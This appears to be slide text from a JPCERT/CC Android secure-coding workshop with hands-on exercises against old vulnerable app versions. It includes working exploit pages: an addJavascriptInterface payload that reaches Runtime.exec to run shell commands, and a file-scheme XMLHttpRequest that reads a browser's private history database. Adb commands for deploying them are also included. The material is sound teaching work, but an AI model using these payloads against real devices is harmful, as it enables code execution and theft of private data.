Copyright©2014 JPCERT/CC All rights reserved.
Install vulnerable app
Vulnerable app —Monaca Debugger for Android ver1.4.1
Monaca Debugger for Android contains an information management vulnerability.
Installation
210
adb install mobi.monaca.debugger-1.4.1.apk
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Logging Vulnerability
Connect Android to PC using the USB —Android
Enable [Developer options] > [USB debugging] —On Android 4.2 and higher, the Developer options screen is
hidden by default. Go to [Settings] > [About phone] and tap [Build number] seven times.
—PC
Launch Monaca Debugger —Type "hoge@example.com" in the Email Address and "abcdefg" in the Password, tap Login.
211
adb shell logcat
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Logging Vulnerability
212
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Find vulnerable code
213
Find vulnerable code!
Copyright©2014 JPCERT/CC All rights reserved.
Spot the Flaw
214
Copyright©2014 JPCERT/CC All rights reserved.
WebView Vulnerability
215
Copyright©2014 JPCERT/CC All rights reserved.
WebView Vulnerability
Javascript is turned on —WebView#addJavascriptInterface
—same origin policy
XMLHttpRequest File schema
216
Copyright©2014 JPCERT/CC All rights reserved.
WebView#addJavascriptInterface
WebView#addJavascriptInterface(Object object, String name) —allows the Java object's method to be accessed from
Javascript
217
@Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.demo); context = this.getApplicationContext(); webView = (WebView) findViewById(R.id.demoWebView); webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new JSObject(this), "jsobject"); }
public class JSObject { Context mContext; public JSObject(Context context) { mContext = context; } }
Copyright©2014 JPCERT/CC All rights reserved.
Install vulnerable app
Vulnerable app —Sleipnir Mobile for Android 2.0.4
Sleipnir Mobile for Android contains an arbitrary Java method execution vulnerability.
Installation app
Exploit code
218
adb install jp.co.fenrir.android.sleipnir-2.0.4.apk
adb push addjavascriptinterface.html /mnt/sdcard/
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: WebView Vulnerability
Launch Sleipnir Mobile Open exploit html file —file://mnt/sdcard/addjavascriptinterface.html
219
Copyright©2014 JPCERT/CC All rights reserved.
Exploit code
addjavascriptinterface.html
220
<html> <body> <p>WebView Vulnerability: addJavascriptInterface</p> <script> var myclass = SleipnirMobile; var classLoader = myclass.getClass().getClassLoader(); // using android.os.Build var buildClass = classLoader.loadClass('android.os.Build'); document.write("<br />"); document.write(buildClass.getField('SERIAL').get(null).toString()); document.write("<br />"); document.write(buildClass.getField('FINGERPRINT').get(null).toString()); // using java.lang.Runtime var runtimeClass = classLoader.loadClass('java.lang.Runtime'); var runtimeMethod = runtimeClass.getMethod('getRuntime', null); var get_runtime = runtimeMethod.invoke(null, null); document.write("<br />"); document.write("create a text file on /mnt/sdcard/"); document.write(get_runtime.exec(['sh', '-c', 'touch /mnt/sdcard/hoge.txt'])); </script> </body> </html>
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Find vulnerable code
221
Find vulnerable code!
Copyright©2014 JPCERT/CC All rights reserved.
Spot the Flaw
222
Copyright©2014 JPCERT/CC All rights reserved.
File schema Vulnerability
Vulnerable app —Sleipnir Mobile for Android 2.0.4
If a user of the affected product uses other malicious Android app, information managed by the affected product may be disclosed.
Exploit code
223
adb push fileschema.html /mnt/sdcard/
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: WebView Vulnerability
Type the following command:
224
adb shell am start -n jp.co.fenrir.android.sleipnir/.main.IntentActivity file:///mnt/sdcard/fileschema.html
Copyright©2014 JPCERT/CC All rights reserved.
Exploit code
fileschema.html
225
<html> <body> <p>WebView Vulnerability: File schema</p> <div id="result"> </div> <script> var xmlhttp = new XMLHttpRequest(); xmlhttp.open('GET', 'file:///data/data/jp.co.fenrir.android.sleipnir/databases/history.db', false); xmlhttp.send(null); var ret = xmlhttp.responseText; document.getElementById('result').innerHTML = ret; </script> </body> </html>
Copyright©2014 JPCERT/CC All rights reserved.
Exercise: Code Assessment Part 4
226
Copyright©2014 JPCERT/CC All rights reserved.
Sample Application
RSS Viewer retrieve RSS data and —parse it —store it in DB —display it using
ListView WebView
227
Copyright©2014 JPCERT/CC All rights reserved.
Eclipse Settings
228
Check the text encoding and build target
text encoding is "UTF-8" Installed SDK version
Copyright©2014 JPCERT/CC All rights reserved.
Sample Application
229
Find as many vulnerabilities
as you can!
top related